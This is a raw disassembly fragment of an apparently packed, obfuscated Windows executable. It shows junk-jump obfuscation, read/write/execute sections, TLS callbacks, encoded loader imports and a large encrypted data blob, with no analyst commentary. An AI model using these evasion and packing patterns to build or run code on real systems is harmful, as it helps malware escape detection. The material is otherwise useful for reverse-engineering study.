loc_428FAE: ; CODE XREF: sub_423BC3:loc_427A7E�j
rol eax, 16h
xor eax, 12060420h
xchg eax, [esp-8+arg_4]
jmp loc_4260F9
; END OF FUNCTION CHUNK FOR sub_423BC3
; ---------------------------------------------------------------------------
xor ecx, esi
jle loc_428675
jmp loc_423FA6
; ---------------------------------------------------------------------------
loc_428FCC: ; DATA XREF: sub_42790F+8�o
xchg ecx, [esp]
mov edi, ecx
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428FD3 proc near ; CODE XREF: sub_427486:loc_4288D7�p
push ebp
mov ebp, esp
jmp sub_426D02
sub_428FD3 endp
; ---------------------------------------------------------------------------
loc_428FDB: ; CODE XREF: hjohnhn9:loc_4266B0�j
inc dword ptr [ebp-0Ch]
dec dword ptr [ebp-18h]
jnz loc_425BB8
jmp loc_427F64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278DC
loc_428FEC: ; CODE XREF: sub_4278DC:loc_427F70�j
pop edi
push 0FA4754E4h
pop eax
and eax, ds:4000F1h
add eax, 403CEF18h
mov eax, [eax]
or eax, eax
jmp loc_42808F
; END OF FUNCTION CHUNK FOR sub_4278DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_429008: ; CODE XREF: sub_425BD2:loc_425AE1�j
pushf
test ebp, esi
jmp loc_424454
; END OF FUNCTION CHUNK FOR sub_425BD2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_54. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_38. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_33. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4279C8
loc_429013: ; CODE XREF: sub_4279C8+A�j
jmp locret_426832
; END OF FUNCTION CHUNK FOR sub_4279C8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424946
loc_429018: ; CODE XREF: sub_424946+11�j
jmp loc_4281EA
; END OF FUNCTION CHUNK FOR sub_424946
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427564
loc_42901D: ; CODE XREF: sub_427564-3858�j
jmp loc_42825D
; END OF FUNCTION CHUNK FOR sub_427564
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_429022: ; CODE XREF: sub_424161-CA3�j
jmp loc_4231F0
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4236A7
loc_429027: ; CODE XREF: sub_4236A7:loc_424F57�j
cmp esi, 0D7B1D993h
jmp loc_424BAE
; END OF FUNCTION CHUNK FOR sub_4236A7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_429032: ; CODE XREF: sub_4260BD:loc_42873A�j
mov edi, esi
xchg edi, [esp+0]
or esi, eax
jmp loc_423BF1
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
loc_42903E: ; DATA XREF: sub_4279C8+5�o
xchg esi, [esp]
mov eax, esi
pop esi
pop eax
push eax
push offset sub_423D67
jmp nullsub_95
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_429050: ; CODE XREF: sub_427C9B:loc_4271A9�j
jo loc_427B9C
test edx, 606EBC7Dh
jmp loc_42858D
; END OF FUNCTION CHUNK FOR sub_427C9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4287BF
loc_429061: ; CODE XREF: sub_4287BF:loc_423767�j
call sub_428436
test al, al
jnz loc_4268DB
mov eax, [ebp-4]
cmp byte ptr [eax], 0E8h
jnz loc_42867B
mov eax, [ebp-4]
inc eax
jmp loc_42757E
; END OF FUNCTION CHUNK FOR sub_4287BF
; ---------------------------------------------------------------------------
loc_429083: ; CODE XREF: hjohnhn9:0042910D�j
or edx, 0F4A62BC0h
loc_429089: ; CODE XREF: hjohnhn9:00429101�j
push offset sub_4275F9
jmp locret_428DA3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_97. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_429094: ; CODE XREF: hjohnhn9:loc_428368�j
cmp dword ptr [ebp-8], 0
jnz loc_427A11
; START OF FUNCTION CHUNK FOR sub_426354
loc_42909E: ; CODE XREF: sub_426354:loc_426E07�j
; sub_427A07+4�j
call sub_426354
loc_4290A3: ; CODE XREF: sub_426523-285�j
jmp loc_42875B
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4263E3
loc_4290A8: ; CODE XREF: sub_4263E3+8E0�j
push offset sub_427FDD
jmp nullsub_113
; END OF FUNCTION CHUNK FOR sub_4263E3
; ---------------------------------------------------------------------------
ror ebx, 1Bh
jmp sub_424361
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF2
loc_4290BA: ; CODE XREF: sub_425BF2-A6�j
; sub_425BF2:loc_427260�j
push 0
push 0
push ebp
mov ebp, ecx
xchg ebp, [esp+0Ch+var_C]
call sub_425CB3
loc_4290C9: ; CODE XREF: hjohnhn9:004273AD�j
jo loc_4281A3
; END OF FUNCTION CHUNK FOR sub_425BF2
; =============== S U B R O U T I N E =======================================
sub_4290CF proc near ; CODE XREF: sub_4241F3+F�p
; FUNCTION CHUNK AT 004246A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426F70 SIZE 0000000D BYTES
xchg edx, [esp+0]
pop edx
jnz loc_426F70
jmp loc_42807E
sub_4290CF endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_117. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4244F5
loc_4290DF: ; CODE XREF: hjohnhn9:loc_424922�j
; sub_4244F5+54C�j
jmp loc_42439F
; END OF FUNCTION CHUNK FOR sub_4244F5
; ---------------------------------------------------------------------------
loc_4290E4: ; CODE XREF: hjohnhn9:0042399D�j
jmp locret_42335B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_88. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
test ecx, esi
jmp loc_423604
; ---------------------------------------------------------------------------
loc_4290F1: ; CODE XREF: hjohnhn9:00427845�j
pop ebx
or eax, 0BA9D7AC2h
rol eax, 0Dh
and eax, 6F6E6B99h
jns loc_429089
; START OF FUNCTION CHUNK FOR sub_42851A
loc_429107: ; CODE XREF: sub_42851A-1B2E�j
jmp loc_424A07
; END OF FUNCTION CHUNK FOR sub_42851A
; ---------------------------------------------------------------------------
push ecx
jmp loc_429083
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_429112: ; CODE XREF: sub_427C9B:loc_42451C�j
push offset sub_4275A3
jmp nullsub_98
; END OF FUNCTION CHUNK FOR sub_427C9B
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42911C proc near ; CODE XREF: sub_424771+6�j
retn
sub_42911C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42362A
loc_42911D: ; CODE XREF: sub_42362A+10�j
jmp locret_426FC1
; END OF FUNCTION CHUNK FOR sub_42362A
; ---------------------------------------------------------------------------
dw 890Fh
dd 0B8A15B77h, 5E3195A3h, 8EEB8AB8h, 48ECh, 3B3h dup(0)
hjohnhn9 ends
; Section 5. (virtual address 0002A000)
; Virtual size : 00009000 ( 36864.)
; Section size in file : 00009000 ( 36864.)
; Offset to raw data for section: 0002A000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
fzj3qwht segment para public 'CODE' use32
assume cs:fzj3qwht
;org 42A000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
db 0CCh
db 0A0h, 2, 0
align 8
dd 0FFFFFFFFh, 2A03Ch, 2A0B4h, 2A108h, 0
dd 0FFFFFFFFh, 2A0E8h, 2A104h, 5 dup(0)
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0
dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6F4C0000h
dd 694C6461h, 72617262h, 4179h, 65470000h, 6F725074h, 64644163h
dd 73736572h, 0
dd 78450000h, 72507469h, 7365636Fh, 73h, 69560000h, 61757472h
dd 6C6C416Ch, 636Fh, 69560000h, 61757472h, 6572466Ch, 65h
dword_42A0B4 dd 77E79F93h ; DATA XREF: sub_432992+28�r
dword_42A0B8 dd 77E805D8h ; DATA XREF: sub_432992+37�r
dword_42A0BC dd 77E7A5FDh ; DATA XREF: sub_432992+8E�r
dword_42A0C0 dd 77E75CB5h ; DATA XREF: fzj3qwht:0042FE57�r
; fzj3qwht:0043174C�r ...
dword_42A0C4 dd 77E7980Ah, 77E79E34h, 2A04Ch, 2A060h, 2A070h, 2A084h
; DATA XREF: sub_432AFD+1E�o
dd 2A094h, 2A0A4h, 0
dd 72657375h, 642E3233h, 6C6Ch, 654D0000h, 67617373h, 786F4265h
dd 41h
dword_42A104 dd 77D6ADD7h ; DATA XREF: fzj3qwht:00430CDA�o
; sub_432A49+64�r
dd 2A0F4h, 0
TlsDirectory dd 0
TlsEnd_ptr dd 0
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsCallbacks
TlsSizeOfZeroFill dd 0
TlsCharacteristics dd 0
TlsIndex dd 0 ; DATA XREF: fzj3qwht:TlsIndex_ptr�o
TlsCallbacks dd offset TlsCallback_0 ; DATA XREF: fzj3qwht:TlsCallbacks_ptr�o
dd 0
; =============== S U B R O U T I N E =======================================
sub_42A134 proc near ; CODE XREF: sub_431F5F:loc_4311F0�p
push esi
push ecx
mov esi, eax
mov ecx, edx
sub ecx, 4
cld
loc_42A13E: ; CODE XREF: sub_42A134+21�j
lodsb
shr al, 1
cmp al, 74h
jnz short loc_42A154
mov eax, [esi]
bswap eax
add eax, ecx
mov [esi], eax
add esi, 4
sub ecx, 4
loc_42A154: ; CODE XREF: sub_42A134+10�j
dec ecx
jg short loc_42A13E
pop ecx
pop esi
retn
sub_42A134 endp
; ---------------------------------------------------------------------------
db 8Bh, 0C0h
dd offset dword_422000
dd 200434Ah, 0
dd 47BC0000h, 111D2091h, 0B00A1208h, 41D80008h, 0DFA49ED0h
dd 0F41630A3h, 13EB709h, 0C84F4287h, 74138925h, 5D84A3C9h
dd 5268E94Ah, 2011F980h, 62020E34h, 15B9A915h, 198C0C1h
dd 0BA303B90h, 608A0022h, 152E8584h, 0A7141AC3h, 0E6528B52h
dd 6244A64Ch, 0AAC5EA21h, 90356825h, 9112A14h, 0CF50B25Bh
dd 402FA6D4h, 28B4EA55h, 0C618A7D3h, 80C01AA9h, 9554AA74h
dd 305D24C1h, 66BEF07Eh, 94CB5738h, 0D15B9C00h, 0E45C7D84h
dd 82074D8Ah, 2DD29DE6h, 0DF63147Bh, 245CA06Ah, 90203764h
dd 1690DDCCh, 76BA516Fh, 0E8764703h, 0CBD20C59h, 5205C3C6h
dd 82D4C9DEh, 4804B48h, 1FBAED06h, 8829270Bh, 0CEE1DD0Ah
dd 0DB8E1BBDh, 916072B4h, 2244D98Eh, 1DDCh, 0
dd 30000000h, 434A0042h, 6132h, 0
dd 20E078D7h, 4C611F97h, 0A7FE4B9Fh, 65E192C5h, 0D17E9892h
dd 9E4C6E17h, 0B7FE0400h, 24F002CFh, 0BA2DC301h, 9D2D9C05h
dd 7465D2D8h, 0E98246D1h, 3E985088h, 81AE82DDh, 0FDB1180h
dd 0D17F0098h, 5383E085h, 22EDEC6h, 72990B86h, 427930FCh
dd 255E8644h, 89D8A1D9h, 9D50A413h, 3FA8742h, 6C37C079h
dd 0F8E83175h, 88C0D561h, 703D3EB5h, 0C683EACEh, 0C3F157A8h
dd 611126DBh, 4EAB781Fh, 5CB25190h, 0E717F9FDh, 0AFB2DB69h
dd 7E5E0387h, 73BB830Eh, 9F710FC2h, 0C125A11Fh, 0A6E6DA2Fh
dd 0DC4F97C7h, 0FCBFBF0h, 781CF99Eh, 48127E1Fh, 981F5703h
dd 0C28EE474h, 13EF401Ah, 6D676D20h, 94D1E4AEh, 0C2500D49h
dd 5C110CC8h, 24EA3F18h, 79E492BFh, 68A4CA62h, 17BADF07h
dd 87024B99h, 6BAADA39h, 0C79AFF2Dh, 0F338AFE0h, 8D008B50h
dd 979C4D8Eh, 0A297BA22h, 0DDA9ADC9h, 0E2F9158Ch, 0F276BA6h
dd 0EA67B824h, 9B593D7Eh, 605EED61h, 0EBB8B82Dh, 42721D10h
dd 9E05A363h, 48107EA6h, 0D627F801h, 0DDE4171Ah, 4F015004h
dd 8E311E1Dh, 46D121BCh, 0E92D80A3h, 0E5C6A880h, 7E2A07E9h
dd 58BC84E1h, 0A0A045E7h, 4EF03EAEh, 7129D7Ah, 6B232D29h
dd 0ABEB2D12h, 0DC632117h, 0F50F0841h, 0E885980Dh, 0F4B5A6B9h
dd 3D18A697h, 36B45FE5h, 3164606h, 300A3F5h, 9CF0C7DBh
dd 7FEE015Fh, 0EE5F0F0Ch, 92565B8Ch, 0CF28B880h, 0F18A227Bh
dd 0EC0B3D99h, 7C3F1BACh, 94824607h, 0E278974Bh, 2553CB81h
dd 6846796Bh, 80338D99h, 0D2D43B6Eh, 0C5B41C3Ah, 0DDFE4585h
dd 0BCD1A003h, 3D7E3D77h, 865FF1B6h, 0A0DCEFADh, 78935ADEh
dd 1E39246Ah, 939143C1h, 0D15BD4F0h, 4363BA0Fh, 0EA89D752h
dd 0DA2195C9h, 987BEFF4h, 585E034Bh, 98A8F01Bh, 0FD3F1F7Eh
dd 0C59A7BB3h, 0D2822436h, 0AA834CA7h, 47701259h, 0C015F3FBh
dd 94C30142h, 2D3440Dh, 89004DE0h, 0E86A1591h, 39E5FD00h
dd 0C7D58A01h, 5FE5E383h, 0C8876260h, 0BA899D08h, 3DF6F444h
dd 0B6393534h, 48754386h, 143B5D46h, 0F851459h, 4515059h
dd 524B151h, 0CBFBDEB8h, 0D0131C22h, 0B22E7351h, 930C3CD2h
dd 4836D4DEh, 1E2CE558h, 0FF8E7317h, 0BFD7B03Ch, 6FB686B3h
dd 47055DF4h, 9262A378h, 21BAFC4Fh, 0EAD0FC6h, 6CA6E1E1h
dd 0F7EB3671h, 0A99AF361h, 0C96B6623h, 6DAFD0E2h, 0C22BF9C6h
dd 31D99C6h, 0C222B1A1h, 87EBEB6Bh, 0CA551FC3h, 53E8529h
dd 0BE89469Ah, 4DEC057Dh, 0D4F30F1Eh, 81992359h, 0B4F548D4h
dd 713EC53Eh, 28414528h, 9BCBD4ACh, 60E70B2Fh, 0D718D84Fh
dd 0FAE2150Bh, 511151F8h, 2CC460F0h, 210FA294h, 0B5D1FBA2h
dd 0A369F0E3h, 0B5D3BCF0h, 7CF1E021h, 0DDF7B0F0h, 4925602Ch
dd 7C530A8Bh, 7186E21Ch, 7809250Bh, 258E0FDCh, 0EC38F55Bh
dd 406DEA9Fh, 8394EB91h, 221F7B89h, 0A78AF5FEh, 22C03F03h
dd 8EE6A90Dh, 0B0E99832h, 0DA47F033h, 0E81A7797h, 9350019Fh
dd 6D49CBA3h, 16018031h, 0D81512AAh, 3BA1488Eh, 0E91F882h
dd 2C67395Eh, 17AAC21Ah, 3D22783Bh, 0EFB208D9h, 24993083h
dd 0A1DFB562h, 6A2FA18Bh, 0A2F9281Fh, 567900Bh, 7DD5D416h
dd 0E0BE39B8h, 79AA6540h, 292AB8BFh, 601CF9F4h, 8DC64AA9h
dd 82C8674h, 6895A71Dh, 0AD9D8C2Ch, 74728029h, 0EFEEEB35h
dd 0D126D147h, 4178F374h, 9CD5AC40h, 2DEF6731h, 4471145Fh
dd 0BDA2C98Dh, 6ED6E06Ch, 0DA2D3138h, 0E73F0532h, 0BEE1BD1h
dd 0C6E0C072h, 510C0FDBh, 813E0308h, 1A93C9AFh, 0AB61E592h
dd 458A4892h, 1A44ED1Dh, 88057AFDh, 0F4B3DEE5h, 824E2C82h
dd 11EB5AB0h, 0C918E8B8h, 0D57FBDF5h, 573AAF1Fh, 6CC37ACDh
dd 156E4BA5h, 0EDD7014Fh, 3F158BECh, 235EE66h, 63135DFAh
dd 540F7041h, 979B36D1h, 0FA3CE5FCh, 0D1EBE44Ch, 7D375D9Ah
dd 0CF374410h, 0BEB9068Fh, 0A1526693h, 0DE02F1DFh, 42D399A6h
dd 0DE54EA36h, 882525ADh, 9B990FCCh, 0ACE0703Ch, 0B53B1E37h
dd 16F018A1h, 0D9109523h, 6CE2C730h, 779520A7h, 26E0DDDCh
dd 7D52F24Dh, 0B03CFC45h, 6B4FE679h, 0F124B07Bh, 0D6A5AB8Fh
dd 851B6BA5h, 0DA353A42h, 2B2778DEh, 0ACB733A0h, 5FCD39D3h
dd 0C6FB4DECh, 4A7405FBh, 0B6C968Dh, 750066F7h, 0DB591F09h
dd 0C29AE2A3h, 60B3D25Ah, 3C76305Fh, 0D67F5B74h, 1BBE3BC6h
dd 7DA81F9h, 8829086Bh, 0E8887FD5h, 1F12B20Ch, 0A526C36Dh
dd 573E79E6h, 0E6EF63C0h, 0FB47447Ah, 0BC99F001h, 7DB73DDh
dd 73F83B38h, 0BA8467A2h, 0D123E8D2h, 2C272459h, 6693A555h
dd 0DF5E512Fh, 0A50E1F8Fh, 0C45484D2h, 0B606567Fh, 40CAF087h
dd 0A4BCD6A8h, 1EBC387Eh, 3303576Eh, 86E6CEDAh, 9AAF158Ah
dd 29339187h, 41897A9h, 614950EAh, 0F46221E4h, 0F5AB7C18h
dd 5EA81AEAh, 0E50F5458h, 0BF2AC18Dh, 0CB22B351h, 0F080A109h
dd 0AB237EE5h, 781F8D77h, 2F2A9917h, 0E0FF6F7Ch, 0DF8185Fh
dd 4AF8ABC8h, 4BEA3B69h, 36260359h, 0C2E8540h, 0FF022204h
dd 3B52AB3Eh, 0D68FE1F1h, 0A3DD446Ah, 0B5A1ED1Bh, 15396841h
dd 45B0AD57h, 0DA70C25h, 0AA828607h, 0D14DD5D9h, 6B4F415Dh
dd 9A8E8FE1h, 8A0C0C1Ch, 0F4069CA6h, 39D3846Fh, 76D548E2h
dd 73968FD3h, 0CBFDF0D6h, 1F068141h, 8AA6E13Ch, 6B9DC1F3h
dd 4554BB2Dh, 0BFA6BD84h, 0E6A27314h, 0A68A7DFAh, 552B4522h
dd 0B5AEB814h, 0C0F2895Ah, 0B353C2FEh, 0AF0EEEADh, 0E2FC22Fh
dd 75D47F43h, 47A54A6Dh, 945B51B4h, 7DD99F48h, 394DEE34h
dd 36CB70DCh, 38685A2Bh, 0A69AB1BCh, 0F170966Fh, 53F0A90Eh
dd 7C282D04h, 0DCBE136Dh, 2129700Ah, 0FB326A20h, 111C4BCAh
dd 9C3B44Bh, 0E88197E1h, 0CF82842Dh, 66837791h, 0DADD961Dh
dd 39331E35h, 0BEA60ABFh, 49F6EAE1h, 8A97AD3Fh, 8B59853Ah
dd 3C988268h, 0F3FD1A28h, 0E755E429h, 4C2F72Ah, 4D088A18h
dd 0B360297h, 0DDE2E07Bh, 1B0ADDFDh, 0CBD8A637h, 171901DEh
dd 0D711A0D3h, 0BFCF4B4Dh, 67AAACBAh, 0C05BD9F8h, 0AB2F279Ah
dd 84B64D4Dh, 790E8206h, 773C6279h, 0B76DD526h, 8D25F2B4h
dd 62C9080h, 0CBDCAA28h, 0B8017019h, 7A36B8BEh, 5374CD6Eh
dd 4D6D75FFh, 6AD057AAh, 0C825DBFAh, 0F28F05EEh, 9E85A0D6h
dd 1C33F996h, 0AE0FAA09h, 81EBC2B3h, 9358081Ch, 0FE7EAB13h
dd 91D98881h, 0F92FEA82h, 32CA9084h, 74E95C9Dh, 0A37C9E9Fh
dd 0D47FA9FFh, 2FE1CADFh, 0BF0B60DEh, 0C02C7C3h, 0C4C17546h
dd 0EB791541h, 6E738C03h, 3E506DD6h, 0F6069B41h, 0EF3D3999h
dd 0FB85D20Fh, 81EB70A4h, 0D8FA925Eh, 88F2DE95h, 42D1F0F1h
dd 6673558Ch, 0F03D053h, 0B3FDA916h, 0DE43E6D7h, 259448AAh
dd 5CEE5E07h, 87619842h, 940CBD6h, 0F1738C1Fh, 1BA5343h
dd 8173268Ah, 0D551B612h, 0E187849h, 4EC13135h, 85A04FB9h
dd 4812A2A3h, 6AA163D2h, 0B65E6FB9h, 0D0FC4C72h, 2AA81098h
dd 3E228B89h, 0F9DAEF4Ah, 2A4C39A2h, 0ED4BE39Ch, 1610EF8Eh
dd 421F8DB3h, 0C440BF73h, 13C38FE7h, 0DB3318CDh, 59713110h
dd 3ECB43F1h, 0F47FE010h, 44FE006Bh, 0D1FCE079h, 0D92CC52Bh
dd 0F85F8DA1h, 9ED9A02Ah, 0DCADF5B1h, 0DA32F4B7h, 18DB639Ch
dd 0E0F263C7h, 0E817403Bh, 0D0E76774h, 5F643F05h, 8198A824h
dd 9F02940Bh, 240C0F01h, 23E90F51h, 0B4FB2971h, 29CF41D5h
dd 0B3686F11h, 50E050FAh, 0B46895A5h, 9B7B5C6Bh, 0F4F857CFh
dd 0FA2A15B8h, 0C6DCB9A8h
dd 318D2E0Ah, 6B119C0h, 0A0477370h, 0A4BAD5B5h, 35CAA222h
dd 8186269Ah, 87A10E66h, 5D500937h, 5F6C1407h, 9EB3729Fh
dd 39D43F15h, 0C2A083F8h, 34CF2E9Ch, 62891434h, 97EE2CA6h
dd 0B16481A8h, 5F990B45h, 8B9F8AA9h, 0BA671DAFh, 3C1E925Fh
dd 973589CBh, 7725FE7Bh, 3D443A3Dh, 3EEA8FEh, 7BB415EAh
dd 0D04AEE2Bh, 153B41B3h, 0B2FA442Fh, 0BC06BDB9h, 0B43F0983h
dd 8B87BF7Ah, 3A241408h, 923693EFh, 81F55E39h, 916CE28Eh
dd 25BA9CBDh, 0A1572040h, 0BFEC3CA3h, 0E1EE561Dh, 2D139939h
dd 2FE57B02h, 72FD96AFh, 0E5143D2Ah, 399BFC68h, 0C32792Ch
dd 7DDE38Bh, 101712FAh, 9A181E2Fh, 97F9DAA0h, 3411FDC5h
dd 46688D53h, 6D30F015h, 0E214FACAh, 30BD8099h, 0FB7C2ACAh
dd 379F9AE7h, 0F5D052FBh, 0C16B2B45h, 0CB9D0998h, 0C1D09537h
dd 53F50846h, 0DD448337h, 7B2ACCBDh, 26DFA976h, 79F16AAh
dd 0D35684B6h, 3FC44D0Eh, 0C805777Dh, 1A9E2FBEh, 0E8881671h
dd 0BAD62C88h, 64F5495h, 0A3E152A3h, 0DC9AA604h, 0D3B22C18h
dd 0F43B3D5Dh, 8B1AC72Bh, 76BF7503h, 9C3B452Eh, 0B8E11B4Dh
dd 0DE31941Eh, 2D54C3D5h, 0B81CCFC0h, 2CDE6C92h, 5FEEF896h
dd 0F826789Ah, 17C0BAE4h, 950853B8h, 35C1F414h, 3333C30Ah
dd 0B285663Eh, 0EB0446D7h, 1D1F5ADDh, 0A2957FD0h, 0C32B5C1Eh
dd 145703E2h, 825F7FD0h, 52FF2D37h, 0E6F710FBh, 0F08A2D14h
dd 0DA5C4627h, 3B802DAh, 0CCC7802Fh, 0DDDD925Ch, 0CA41E561h
dd 0AB6BF5FBh, 0F0C8C802h, 6FB56450h, 0EC9F7E40h, 8237CA03h
dd 5E9EC0F6h, 33B4A3B5h, 2B3D68ADh, 0D9FF7AECh, 3C39C7ABh
dd 82291958h, 0C65FBC97h, 0CA3C738Bh, 92F2D7A7h, 0C05BE37Ch
dd 762C3424h, 34340591h, 2C5AC409h, 0A474FDBDh, 0CA5B980Fh
dd 0C09C97C1h, 0E5656F08h, 10A9148Eh, 0F55873E2h, 0DB2E539Ch
dd 6236C7AEh, 0CB456ADEh, 0A00B7F73h, 1809C7ACh, 377417A5h
dd 0EBA695A0h, 49DC40Ah, 355A51EDh, 1B0E9F26h, 0F0B289CBh
dd 84E34E21h, 0F3EDFBB8h, 32F5974Fh, 0B45B08DAh, 27EFC1BCh
dd 0D6B45A6Bh, 0ED0E5066h, 9762A30Eh, 625F0E93h, 0D55F5359h
dd 80C267C0h, 14FA60Eh, 0FA646BBAh, 0DBE5370Dh, 81B70AD3h
dd 0C3A0E1CCh, 0FB381F1Fh, 96FD8958h, 708899F8h, 0EDFB9F29h
dd 0B02CFFBDh, 4D9A5DE5h, 0FCE4DDDh, 0A8707911h, 0AABB4CDDh
dd 0EF607CFh, 73994661h, 2F1352B5h, 4324ED93h, 0DC4C602Eh
dd 626BAE6h, 0B695990Dh, 8E748508h, 9F140D79h, 0BE2C0F4Fh
dd 0CF96A75Ah, 0A1F88E24h, 0F013267Fh, 74BD502Ah, 0BDA3ABF0h
dd 0E347D612h, 0B17FDAEEh, 7EFB429h, 93E092E3h, 0C78562CDh
dd 2D90C492h, 0D5E55590h, 6D773AEDh, 507AE4D6h, 0D0259982h
dd 0FE899EF6h, 0E968069Fh, 1DC70BD1h, 79AA9436h, 237C1CA3h
dd 2E711400h, 0A0F4150Bh, 4A4B0C4Bh, 51DEDE0Fh, 0A63DC4CAh
dd 0E8C101FAh, 29CFB71Eh, 15D5595Ch, 0F8F82793h, 0A285F835h
dd 39054B74h, 5FF363B3h, 5DAEAB5Fh, 4FD292B4h, 401D3D29h
dd 0C820FCA7h, 0E7BC102Ch, 5D57D852h, 0A51C8197h, 50F13458h
dd 987E1BCBh, 2F71E4C3h, 0D7264D86h, 968F4562h, 77E5F303h
dd 2F2AA6DFh, 0C9FDD935h, 31BBFD50h, 0CEA154A5h, 676025FEh
dd 1FEFCCC3h, 6A0918DBh, 0D919DBA0h, 0DB4AFE8Ah, 31379789h
dd 3BF9AD59h, 62D6A182h, 8F3EFEh, 741E7095h, 0DFDA36AFh
dd 7A3FBCD8h, 0B2A80165h, 0A928DA7Eh, 0C42FE581h, 0E161365Dh
dd 9D129D06h, 0FB2321C0h, 3CD4D19Ch, 0D6E3E48Ah, 69655C1Eh
dd 5450087Dh, 51E0DCF6h, 542AC0BBh, 0E28925F2h, 0D6BF2725h
dd 62B368C6h, 0CF04AFEFh, 0C56D1206h, 0EDD4DC09h, 8A86F980h
dd 89285AC0h, 93E15268h, 0C0FC8A20h, 3284EB3Dh, 5BD15E1Fh
dd 0AB31C886h, 894FE113h, 53EC029Fh, 3471CC58h, 0FC0C057Ch
dd 0F86E1FDFh, 0AD0FC1F5h, 540C4C47h, 0C63C8707h, 9B17358Dh
dd 0B4491700h, 0D9A1AFE0h, 4AEE7FB6h, 88C7AAFDh, 5152EEA3h
dd 5FF7986Eh, 978F812h, 1DB54A61h, 6A0C1C35h, 294BB851h
dd 4F5D8653h, 8DF96B9h, 0EDF6F26Eh, 0D7B38AD2h, 0D5B2E432h
dd 76F8781Eh, 949FDFB1h, 0D7018EA9h, 4B82AF52h, 6C46E952h
dd 61F8A97Ch, 982FF97Fh, 4747C86Ah, 0B60073A0h, 0D380A9BDh
dd 53C6A9C0h, 0D86CA454h, 6B45C5D2h, 39B47A0Ch, 0F97E873h
dd 0F1D250E1h, 0AD114B7Eh, 125F5A51h, 3CC37DBDh, 1F12F98Bh
dd 8265A37h, 3BCFCDD1h, 50D0E463h, 0B81A42FFh, 684D8495h
dd 0F9F1B53Dh, 151E18EFh, 79DA709Ch, 9246DA1Bh, 1B553C42h
dd 0D8BA3E44h, 80B7783h, 23C73993h, 40BEA125h, 0CF5118A5h
dd 5150CCD4h, 0AD1E68DCh, 4FCEB6BDh, 0BBCEA896h, 520925E8h
dd 0BA72EB57h, 82FC8ECDh, 3895C818h, 4A5A5A64h, 0D0E3363Dh
dd 77204039h, 0D9FBB174h, 3303722h, 0E9549D1h, 0E6D8ED4Eh
dd 82FE8FB1h, 0C1F54170h, 3D9D4C96h, 8BCB12EBh, 4DA20533h
dd 6C66F8D9h, 383E25C9h, 0DBAB3E87h, 0E3336F2Bh, 98BF819Ch
dd 4CA9651Ch, 0F93F6255h, 22BD050Fh, 6039EE18h, 7BE6579Fh
dd 121EAF42h, 0B3C100B3h, 5E541B95h, 4984EFE7h, 2A189F03h
dd 4125FC32h, 6B5839ECh, 0F2DCADCAh, 9C89F385h, 55547A4h
dd 0FCF30FE0h, 312ACC24h, 0FF0AF42h, 0A60F8128h, 78F1BAB7h
dd 0D7A1C550h, 0B4B45D2Fh, 8D28DD5Bh, 0C383CA14h, 0E11904ADh
dd 67F96102h, 0EC242EDFh, 0B78A2581h, 0E0C23ED2h, 0DF03B0CBh
dd 76A44A25h, 97C90236h, 0C2E5C1E7h, 0C71E8694h, 262AD444h
dd 3ECD4450h, 1C236B7h, 0F9556F24h, 0D9B6C1BBh, 76731B15h
dd 19D8F964h, 5678C039h, 7ABE6A92h, 0EBF2769Dh, 4D8DB41Dh
dd 7F5B5B47h, 46FFA1C3h, 0A91E7DA5h, 753E463Fh, 83C68982h
dd 94E717C7h, 0AFE07C17h, 0CC85BF31h, 0F7E02A75h, 0E14A5AA8h
dd 119F097Bh, 9D568CFBh, 0A0ACA0FDh, 6890BA62h, 367FB9C3h
dd 5935206Bh, 5D27BABBh, 3B5C1642h, 59C7106Fh, 0E766BD66h
dd 0E391AEC8h, 1176502h, 0C5D2E78Bh, 0A6617844h, 33314974h
dd 0D8CBFBA5h, 0F37BE8CAh, 4E9C2843h, 5ED18C0Fh, 6E7725C2h
dd 0F85692B8h, 0C099E290h, 83DE9FB3h, 81E972A8h, 9D0FA2D8h
dd 0D7E9B4D3h, 1A053F5Dh, 0F040655Fh, 1B8C0F3Eh, 5B8989F0h
